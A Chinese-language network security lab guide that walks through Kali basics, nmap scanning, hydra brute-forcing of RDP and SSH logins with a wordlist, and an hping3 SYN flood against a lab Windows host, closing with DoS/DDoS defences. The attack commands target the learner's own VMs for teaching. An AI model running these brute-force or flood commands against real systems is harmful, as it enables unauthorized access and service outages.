Top

  1. 使用 kali 命令行界面
  2. 为 kali 主机配置网络
  3. 通过 nmap 扫描搜集信息
  4. hydra 暴力破解
  5. DoS 攻击效果体验
  6. DoS 与 DDoS 防御

1 使用 kali 命令行界面

1.1 问题

首先,以 kali 用户登入桌面环境,并通过命令行完成以下操作。

1)执行 ls / 列出根目录下有哪些内容

2)执行 pwd 检查当前位置

3)执行 cd /boot/ 切换目录 ,执行 pwd 确认结果

然后,可以执行 sudo -i 提权为管理员,完成以下操作。

1)执行 pwd 检查当前位置

2)执行 vim /boot/root.txt 创建一个新文件,内容为 “I am here.”

3)退出 vim 编辑器,执行 cat /boot/root.txt 查看文件内容

1.2 步骤

实现此案例需要按照如下步骤进行。

步骤一:以 kali 用户登入桌面环境,并通过命令行完成相关操作

1)进入命令行窗口

以 kali 用户登录,单击桌面左上的 “终端模拟器”,即可打开命令行窗口,如图 - 1 所示。

CASE - 图1

图 - 1

2)执行 ls / 列出根目录下有哪些内容

  1. 1. ┌──(kalikali)-\[~\]
  2. 2. └─$ ls /
  3. 3. bin etc initrd.img.old lib64 media proc sbin tmp vmlinuz
  4. 4. boot home lib libx32 mnt root srv usr vmlinuz.old
  5. 5. dev initrd.img lib32 lost+found opt run sys var

3)执行 pwd 检查当前位置

  1. 1. ┌──(kalikali)-\[~\]
  2. 2. └─$ pwd
  3. 3. /home/kali

4)执行 cd /boot/ 切换目录 ,执行 pwd 确认结果

  1. 1. ┌──(kalikali)-\[~\]
  2. 2. └─$ cd /boot/
  3. 4. ┌──(kalikali)-\[/boot\]
  4. 5. └─$ pwd
  5. 6. /boot

步骤二:执行 sudo -i 提权为管理员,完成相关命令操作

1)执行 sudo -i 切入 root 的命令行环境

  1. 1. ┌──(kalikali)-\[/boot\]
  2. 2. └─$ sudo -i
  3. 3. \[sudo\] kali 的密码:
  4. 4. ┏━(Message from Kali developers)
  5. 5.
  6. 6. We have kept /usr/bin/python pointing to Python 2 for backwards
  7. 7. compatibility. Learn how to change this and avoid this message:
  8. 8. https:
  9. 9.
  10. 10. ┗━(Run touch ~/.hushlogin to hide this message)
  11. 11. ┌──(root💀kali)-\[~\]
  12. 12. └─#

2)执行 pwd 检查当前位置

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─$ pwd
  3. 3. /root

3)执行 vim /boot/root.txt 创建一个新文件,内容为 “I am here.”

以下命令表示将要在 / boot / 目录下创建一个名为 root.txt 的文件:

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# vim /boot/root.txt

按 Enter 键提交以后,会进入 vim 编辑器的命令模式(初始状态),左下角提示新文件的位置和 “[新]” 的字样,如图 - 2 所示。

CASE - 图2

图 - 2

如果要向文件内录入文本内容,可以按一下 i 键,这时 vim 编辑器左下角会提示 “— 插入 —” 字样,如图 - 3 所示,表示状态已经切换为编辑模式了。

CASE - 图3

图 - 3

在文件内录入 “I am here.” 内容,会直接显示在屏幕上,如图 - 4 所示。

CASE - 图4

图 - 4

完成内容编辑以后,如果要保存修改并退出编辑器,应该先按 Esc 键返回初始模式(左下角的 “— 插入 —” 会消失),再按冒号 : 切换到末行模式(左下角提示一个“: ”),如图 - 5 所示。

CASE - 图5

图 - 5

接下来只需要在: 后面输入 wq,然后按 Enter 键,如图 - 6 所示,就可以先保存所作的修改,并且退出 vim 编辑器了。退出 vim 编辑器以后,会自动回到原来的命令行环境。

CASE - 图6

图 - 6

4)退出 vim 编辑器,执行 cat /boot/root.txt 查看文件内容

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# cat /boot/root.txt
  3. 3. I am here.

注意多利用 Tab 自动补全,文件名不要输错了,否则会出现类似 “cat: …… : 没有那个文件或目录” 的报错提示。

2 为 kali 主机配置网络

2.1 问题

本例要求从命令行为 kali 主机配置静态网络参数,并确保从真机可以 ping 通这个自行配置的 IP 地址,相关说明如下。

首先可调整 VMware 虚拟网络,设置与 kali 虚拟机连接的 VMnet8 网络(默认 NAT 网络)采用 192.168.10.0 子网。这样设好以后,Windows 真机的 VMnet8 接口会自动使用 192.168.10.2 这个 IP 地址,方便与 kali 虚拟机互连。

然后按照以下要求为 kali 虚拟机设置静态地址:

1)IP 地址及掩码:192.168.10.211/24

2)默认网关:192.168.10.2

3)DNS 服务器地址:192.168.10.2

最后检查结果时,要确保从真机能 ping 通 192.168.10.211,按 Ctrl+C 可停止。

2.2 步骤

实现此案例需要按照如下步骤进行。

步骤一:调整 VMware 虚拟网络

1)打开 VMware Workstation 的 “虚拟网络编辑器”

单击 VMware Workstation 软件菜单 “编辑”->“虚拟网络编辑器”,可以打开虚拟网络设置窗口,如图 - 7 所示。

CASE - 图7

图 - 7

再单击右下角的 “更改设置” 按钮,表示将要以管理员权限来修改设置(如果出现 “用户账户控制” 的提示,请选择“是”),如图 - 8 所示。

CASE - 图8

图 - 8

2)找到 VMnet8 网络,设置子网号 192.168.10.0

选择 VMnet8,将对应的 “子网 IP 栏” 修改为 192.168.10.0,如图 - 9 所示,然后单击 “确定” 即可。

CASE - 图9

图 - 9

步骤二:使用 nmtui 为 kali 虚拟机设置静态地址

1)以管理员权限执行 nmtui 命令

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# nmtui

可以打开 nmtui 网络配置器,如图 - 10 所示。

CASE - 图10

图 - 10

2)修改 IP 地址、默认网关、DNS 服务器地址

确认当前已选中 “编辑连接”,单击 Enter 键,看到默认已选中有线连接 “Wired connection 1”,如图 - 11 所示,再次单击 Enter 键。

CASE - 图11

图 - 11

进入 “编辑连接” 界面以后,按 Tab 键移动光盘、按 Enter 键进行选择,将 IPv4 配置方法设置为 “手动”;然后“显示” 出地址参数,根据实验要求设置好 IP 地址和掩码 192.168.10.211/24,将默认网关、DNS 服务器都设置为 192.168.10.2,确保 “自动连接” 前面为“[X]” 选中状态,如图 - 12 所示。

CASE - 图12

图 - 12

最后单击 “确定”->“返回”,回到 nmtui 管理器初始界面。

3)重新激活连接

在 nmtui 管理器初始界面中,单击 “启用连接”,如图 - 13 所示。

CASE - 图13

图 - 13

看到 “Wired connection1” 连接名以后,如图 - 14 所示,先后单击 2 次 Enter 键(中间可以间隔 2 秒左右),表示先停用此连接,再启用此连接,以重新读取更改后的新配置。注意,连接名前面必须有 “*” 标记,才表示此连接已经激活了。

CASE - 图14

图 - 14

步骤三:确认配置结果,并测试连通性

1)查看 IP 地址

执行 ifconfig 命令,可以看到 IP 地址为 192.168.10.211,子网掩码为 255.255.255.0。

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# ifconfig
  3. 3. eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
  4. 4. inet 192.168.10.211 netmask 255.255.255.0 broadcast 192.168.10.255
  5. 5. inet6 fe80::20c:29ff:fee9:7c5c prefixlen 64 scopeid 0x20<link>
  6. 6. ether 00:0c:29:e9:7c:5c txqueuelen 1000 (Ethernet)
  7. 7. RX packets 47 bytes 6276 (6.1 KiB)
  8. 8. RX errors 0 dropped 0 overruns 0 frame 0
  9. 9. TX packets 42 bytes 5182 (5.0 KiB)
  10. 10. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  11. 12. lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
  12. 13. inet 127.0.0.1 netmask 255.0.0.0
  13. 14. inet6 ::1 prefixlen 128 scopeid 0x10<host>
  14. 15. loop txqueuelen 1000 (Local Loopback)
  15. 16. RX packets 8 bytes 400 (400.0 B)
  16. 17. RX errors 0 dropped 0 overruns 0 frame 0
  17. 18. TX packets 8 bytes 400 (400.0 B)
  18. 19. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

2)查看默认网关

执行 route -n 命令,可以看到一条目的地、子网掩码都是 0.0.0.0 的路由条目,对应的 Gateway 显示为 192.168.10.2,这就是已经设置的本机的默认网关记录。

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# route -n
  3. 3. Kernel IP routing table
  4. 4. Destination Gateway Genmask Flags Metric Ref Use Iface
  5. 5. 0.0.0.0 192.168.10.2 0.0.0.0 UG 100 0 0 eth0
  6. 6. 192.168.10.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0

3)查看 DNS 地址

执行 cat /etc/resolv.conf 命令(显示 DNS 配置文件内容),可以看到有一条 “nameserver DNS 服务器地址” 的记录。

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# cat /etc/resolv.conf
  3. 3. \# Generated by NetworkManager
  4. 4. nameserver 192.168.10.2

4)从 Windows 真机检测与 kali 虚拟机的连通性

使用 ping 命令检查 kali 主机的 IP 地址 192.168.10.211,应成功收到反馈。

  1. 1. Microsoft Windows \[版本 10.0.18362.535\]
  2. 2. (c) 2019 Microsoft Corporation。保留所有权利。
  3. 4. C:\Users\tedu> ping 192.168.10.211
  4. 6. 正在 Ping 192.168.10.211 具有 32 字节的数据:
  5. 7. 来自 192.168.10.211 的回复: 字节=32 时间<1ms TTL=64
  6. 8. 来自 192.168.10.211 的回复: 字节=32 时间<1ms TTL=64
  7. 9. 来自 192.168.10.211 的回复: 字节=32 时间<1ms TTL=64
  8. 10. 来自 192.168.10.211 的回复: 字节=32 时间<1ms TTL=64
  9. 12. 192.168.10.211 Ping 统计信息:
  10. 13. 数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失),
  11. 14. 往返行程的估计时间(以毫秒为单位):
  12. 15. 最短 = 0ms,最长 = 0ms,平均 = 0ms
  13. 17. C:\Users\tedu>

3 通过 nmap 扫描搜集信息

3.1 问题

本例要求基于准备的 kali2021 测试机、win2008 靶机,使用 nmap 扫描工具搜集目标主机或网络中的信息,相关说明如下。

首先准备好实验环境。

1)测试机 / 靶机 1:kali2021,开启 21、22 端口

2)靶机 2:win2008,开启 3389 端口

然后在 kali 主机上执行扫描任务。

1)检测 2 台主机是否开放了 3389 端口

2)检测靶机 1、靶机 2 的操作系统

3)检测靶机 1 的 22 端口对应哪个版本的什么软件

4)检测 192.168.10.0/24 网段中有哪些主机开放 22 端口

3.2 步骤

实现此案例需要按照如下步骤进行。

步骤一:准备好实验环境

1)测试机 / 靶机 1:kali2021,开启 21、22 端口

kali 主机上 ssh 服务的软件包默认已经安装好,所以只需要安装一下 vsftpd 软件包就可以了。

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# apt-get -y install vsftpd
  3. 3. .. ..

然后就可以使用 systemctl 系统控制工具来启动 vsftpd 和 ssh 这两个系统服务了。

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# systemctl start vsftpd ssh
  3. 3. .. ..

2)靶机 2:win2008,开启 3389 端口

注意关闭 Windows 防火墙,如图 - 15 所示。

CASE - 图15

图 - 15

开启远程桌面连接,如图 - 16 所示。

CASE - 图16

图 - 16

步骤二:在 kali 主机上执行扫描任务

1)检测 2 台主机是否开放了 3389 端口

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# nmap -sS -p 3389 192.168.10.128,211
  3. 3. Starting Nmap 7.91 ( https:
  4. 4. Nmap scan report for 192.168.10.128
  5. 5. Host is up (0.00038s latency).
  6. 7. PORT STATE SERVICE
  7. 8. 3389/tcp open ms-wbt-server
  8. 9. MAC Address: 00:0C:29:AF:D9:F8 (VMware)
  9. 11. Nmap scan report for 192.168.10.211
  10. 12. Host is up (0.000015s latency).
  11. 14. PORT STATE SERVICE
  12. 15. 3389/tcp closed ms-wbt-server
  13. 17. Nmap done: 2 IP addresses (2 hosts up) scanned in 0.18 seconds

2)检测靶机 1、靶机 2 的操作系统

检测靶机 1:

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# nmap -O -p 3389 192.168.10.128
  3. 3. Starting Nmap 7.91 ( https:
  4. 4. Nmap scan report for 192.168.10.128
  5. 5. Host is up (0.00038s latency).
  6. 7. PORT STATE SERVICE
  7. 8. 3389/tcp open ms-wbt-server
  8. 9. MAC Address: 00:0C:29:AF:D9:F8 (VMware)
  9. 10. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  10. 11. Device type: general purpose
  11. 12. Running: Microsoft Windows 7|2008
  12. 13. OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows\_server\_2008:r2
  13. 14. OS details: Microsoft Windows 7 or Windows Server 2008 R2
  14. 15. Network Distance: 1 hop
  15. 17. OS detection performed. Please report any incorrect results at https:
  16. 18. Nmap done: 1 IP address (1 host up) scanned in 1.26 seconds

检测靶机 2:

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# nmap -O -p 22 192.168.10.211
  3. 3. Starting Nmap 7.91 ( https:
  4. 4. Nmap scan report for 192.168.10.211
  5. 5. Host is up (0.000038s latency).
  6. 7. PORT STATE SERVICE
  7. 8. 22/tcp open ssh
  8. 9. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  9. 10. Device type: general purpose
  10. 11. Running: Linux 2.6.X
  11. 12. OS CPE: cpe:/o:linux:linux_kernel:2.6.32
  12. 13. OS details: Linux 2.6.32
  13. 14. Network Distance: 0 hops
  14. 16. OS detection performed. Please report any incorrect results at https:
  15. 17. Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds

3)检测靶机 1 的 22 端口对应哪个版本的什么软件

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# nmap -sV -p 21 192.168.10.211
  3. 3. Starting Nmap 7.91 ( https:
  4. 4. Nmap scan report for 192.168.10.211
  5. 5. Host is up (0.000029s latency).
  6. 7. PORT STATE SERVICE VERSION
  7. 8. 21/tcp open ftp vsftpd 3.0.3
  8. 9. Service Info: OS: Unix
  9. 11. Service detection performed. Please report any incorrect results at https:
  10. 12. Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds

4)检测 192.168.10.0/24 网段中有哪些主机开放 22 端口

注意观察状态标记为 “open” 的端口信息。

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# nmap -sS -p 21,22,80,3389 192.168.10.0/24
  3. 3. Starting Nmap 7.91 ( https:
  4. 4. Nmap scan report for 192.168.10.1
  5. 5. Host is up (0.00010s latency).
  6. 7. PORT STATE SERVICE
  7. 8. 21/tcp filtered ftp
  8. 9. 22/tcp filtered ssh
  9. 10. 80/tcp filtered http
  10. 11. 3389/tcp filtered ms-wbt-server
  11. 12. MAC Address: 00:50:56:C0:00:08 (VMware)
  12. 14. Nmap scan report for 192.168.10.2
  13. 15. Host is up (0.000095s latency).
  14. 17. PORT STATE SERVICE
  15. 18. 21/tcp closed ftp
  16. 19. 22/tcp closed ssh
  17. 20. 80/tcp closed http
  18. 21. 3389/tcp closed ms-wbt-server
  19. 22. MAC Address: 00:50:56:E8:59:F2 (VMware)
  20. 24. Nmap scan report for 192.168.10.128
  21. 25. Host is up (0.00017s latency).
  22. 27. PORT STATE SERVICE
  23. 28. 21/tcp closed ftp
  24. 29. 22/tcp closed ssh
  25. 30. 80/tcp closed http
  26. 31. 3389/tcp open ms-wbt-server
  27. 32. MAC Address: 00:0C:29:AF:D9:F8 (VMware)
  28. 34. Nmap scan report for 192.168.10.254
  29. 35. Host is up (0.00014s latency).
  30. 37. PORT STATE SERVICE
  31. 38. 21/tcp filtered ftp
  32. 39. 22/tcp filtered ssh
  33. 40. 80/tcp filtered http
  34. 41. 3389/tcp filtered ms-wbt-server
  35. 42. MAC Address: 00:50:56:E5:F6:AA (VMware)
  36. 44. Nmap scan report for 192.168.10.211
  37. 45. Host is up (0.000016s latency).
  38. 47. PORT STATE SERVICE
  39. 48. 21/tcp open ftp
  40. 49. 22/tcp open ssh
  41. 50. 80/tcp closed http
  42. 51. 3389/tcp closed ms-wbt-server
  43. 53. Nmap done: 256 IP addresses (5 hosts up) scanned in 3.18 seconds

4 hydra 暴力破解

4.1 问题

本例要求基于准备的 kali2021 测试机、win2008 靶机,使用 hydra 工具练习暴力破解攻击的典型方法,相关说明如下。

1)准备 kali2021、win2008 实验环境

2)针对 win2008 主机,暴力破解远程桌面的登录密码

3)针对 kali2021 主机,暴力破解远程终端的登录密码

4.2 步骤

实现此案例需要按照如下步骤进行。

步骤一:准备 kali2021、win2008 实验环境

参见前一个实验案例。

步骤二:针对 win2008 主机,暴力破解远程桌面的登录密码

1)准备密码字典文件

手写字典(人工干预,把最可能用到的密码都罗列进去):

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# vim pass.list
  3. 3. kali
  4. 4. pwd@1234
  5. 5. tedu.cn1234
  6. 6. 123456
  7. 7. 1234
  8. 8. 12345678
  9. 9. 1234567890
  10. 10. Iloveyou
  11. 11. qwerty
  12. 12. Abc1234
  13. 13. Abc123
  14. 14. \*\*\*\*\*\*
  15. 15. password
  16. 16. pass
  17. 17. .. ..

利用工具生成字典(crunch 制作,容量大,耗时长):

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# crunch 8 8 pwd@123456 -o pass.crunch
  3. 3. Crunch will now generate the following amount of data: 900000000 bytes
  4. 4. 858 MB
  5. 5. 0 GB
  6. 6. 0 TB
  7. 7. 0 PB
  8. 8. Crunch will now generate the following number of lines: 100000000
  9. 9. .. ..
  10. 11. crunch: 76% completed generating output
  11. 13. crunch: 100% completed generating output

2)使用 hydra 工具,调用密码字典执行攻击

执行 hydra 命令时,结合 - l 选项指定用户名,结合 - P 选项指定使用的密码字典文件,然后指定目标 IP 地址,最后指定 rdp 表示攻击的服务类型。

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# hydra -l Administrator -P pass.list 192.168.10.128 rdp
  3. 3. Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these \*\*\* ignore laws and ethics anyway).
  4. 5. Hydra (https:
  5. 6. \[WARNING\] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
  6. 7. \[INFO\] Reduced number of tasks to 4 (rdp does not like many parallel connections)
  7. 8. \[WARNING\] the rdp module is experimental. Please test, report - and if possible, fix.
  8. 9. \[DATA\] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
  9. 10. \[DATA\] attacking rdp://192.168.10.128:3389/
  10. 11. \[3389\]\[rdp\] host: 192.168.10.128 login: Administrator password: pwd@1234
  11. 12. 1 of 1 target successfully completed, 1 valid password found
  12. 13. Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-23 23:15:06

如果破解成功,应该可以看到获取的用户名和密码:

  1. 1. \[3389\]\[rdp\] host: 192.168.10.128 login: Administrator password: pwd@1234

3)验证破解成果

在 kali 主机上可以直接使用 rdesktop 远程桌面连接工具:

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# rdesktop -u Administrator 192.168.10.128
  3. 3. .. ..
  4. 4. Do you trust this certificate (yes/no)? yes
  5. 5. .. ..
  6. 6. Connection established using SSL.

成功连接以后,即可看到登录界面,如图 - 17 所示。

CASE - 图17

图 - 17

单击 Administator 用户名,根据提示输入破解获得的密码 pwd@1234,即可成功连入远程桌面,实现远程控制,如图 - 18 所示。

CASE - 图18

图 - 18

步骤三:针对 kali2021 主机,暴力破解远程终端的登录密码

1)准备密码字典文件

手写字典,或者利用工具生成字典。

方法见步骤二,也可以直接使用前面创建的 pass.list 字典文件。

2)使用 hydra 工具,调用密码字典执行攻击

执行 hydra 命令时,结合 - l 选项指定用户名,结合 - P 选项指定使用的密码字典文件,然后指定目标 IP 地址,最后指定 ssh 表示攻击的服务类型。

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# hydra -l kali -P pass.list 192.168.10.211 ssh
  3. 3. Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these \*\*\* ignore laws and ethics anyway).
  4. 5. Hydra (https:
  5. 6. \[WARNING\] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
  6. 7. \[DATA\] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
  7. 8. \[DATA\] attacking ssh:
  8. 9. \[22\]\[ssh\] host: 192.168.10.211 login: kali password: kali
  9. 10. 1 of 1 target successfully completed, 1 valid password found
  10. 11. Hydra (https:

如果破解成功,应该可以看到获取的用户名和密码:

  1. 1. \[22\]\[ssh\] host: 192.168.10.211 login: kali password: kali

3)验证破解成果

在 kali 主机上可以直接使用 ssh 远程终端连接工具:

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# ssh kali@192.168.10.211
  3. 3. The authenticity of host '192.168.10.211 (192.168.10.211)' can't be established.
  4. 4. ECDSA key fingerprint is SHA256:Qn4fOeFwM+2V/mJm/xTKbB6dd8cKklOkUYYPXHXKdLs.
  5. 5. Are you sure you want to continue connecting (yes/no/\[fingerprint\])? yes //接受密钥
  6. 6. Warning: Permanently added '192.168.10.211' (ECDSA) to the list of known hosts.
  7. 7. kali@192.168.10.211's password:
  8. 8. Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64
  9. 10. The programs included with the Kali GNU/Linux system are free software;
  10. 11. the exact distribution terms for each program are described in the
  11. 12. individual files in /usr/share/doc
  12. 21. [https://www.kali.org/docs/general-use/python3-transition/](https://www.kali.org/docs/general-use/python3-transition/)

如果需要返回 ssh 连接之前的 kali 环境,可以执行 exit 命令。

  1. 1. ┌──(kalikali)-\[~\]
  2. 2. └─$ exit
  3. 3. Connection to 192.168.10.211 closed.
  4. 5. ┌──(root💀kali)-\[~\]
  5. 6. └─#

5 DoS 攻击效果体验

5.1 问题

1)从 win10 真机访问 win2008 靶机的远程桌面

2)从 kali2021 对 win2008 靶机的 3389 端口执行 hping3 泛洪测试

3)再次从 win10 真机访问 win2008 靶机的远程桌面

4)停止 hping3 泛洪测试

5.2 步骤

实现此案例需要按照如下步骤进行。

步骤一:从 win10 真机访问 win2008 靶机的远程桌面

开始 -> 运行 ->mstsc,在 win10 真机连接 win2008 靶机 192.168.10.128,可以正常使用 Administrator 用户登录到远程桌面。如图 - 19 所示。

CASE - 图19

图 - 19

步骤二:从 kali2021 对 win2008 靶机的 3389 端口执行 hping3 泛洪测试

在 kali2021 测试机上,通过命令行发起 hping3 泛洪测试。

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# hping3 --syn --flood -p 3389 192.168.10.128
  3. 3. HPING 192.168.10.128 (eth0 192.168.10.128): S set, 40 headers + 0 data bytes
  4. 4. hping in flood mode, no replies will be shown
  5. 5. .. ..

步骤三:再次从 win10 真机访问 win2008 靶机的远程桌面

在 win10 真机上,再次通过 mstsc 连接 win2008 靶机的远程桌面,会发现无法连接。等待一段时间以后,弹窗提示 “无法连接”,如图 - 20 所示。

CASE - 图20

图 - 20

步骤四:停止 hping3 泛洪测试

在 kali2021 测试机上,需要停止泛洪攻击时,可以在 hping3 命令执行界面按 Ctrl+C 组合键。

  1. 1. ┌──(root💀kali)-\[~\]
  2. 2. └─# hping3 --syn --flood -p 3389 192.168.10.128
  3. 3. HPING 192.168.10.128 (eth0 192.168.10.128): S set, 40 headers + 0 data bytes
  4. 4. hping in flood mode, no replies will be shown
  5. 5. .. ..
  6. 6. ^C
  7. 7. ┌──(root💀kali)-\[~\]
  8. 8. └─# h

稍等待几分钟后,远程桌面服务即可恢复正常。

6 DoS 与 DDoS 防御

6.1 问题

1)什么是 DoS 攻击?

2)什么是 DDoS 攻击?

3)如何防范 DoS 或 DDoS 攻击

6.2 步骤

实现此案例需要按照如下步骤进行。

1)DoS,拒绝服务(Denial of Service)指的是通过各种手段,最终导致目标系统崩溃、失去响应,从而无法正常提供资源或服务的情况。

2)DDoS 攻击,即 Distributed Denial of Service(分布式拒绝服务),这种方式的攻击方不再是一台主机,数量上呈现规模化,可能是分布在不同网络、不同位置的成千上万的主机(通常称为 “僵尸网络”)被发起者所控制。

3)一方面可以提高服务方的交付能力,比如:

  • 减少服务配置的等待时间
  • 优化单一客户机的并发响应策略
  • 更换高性能设备
  • 增加网络带宽
  • 采用负载均衡架构
  • 部署 CDN 内容分发网络

另一方面可以部署专用的软硬件防御产品,比如:

  • 冰盾防火墙
  • 流量清洗、 DDoS 高防 IP
  • IDS 入侵防御设备
  • 抗 DDoS 专用防火墙设备

企业可以根据目标业务的关键程度、需要保护的强度、保护机制的成本自行选择。
https://tts.tmooc.cn/ttsPage/NTD/NTDTN202109/NETSEC/DAY02/CASE/01/index.html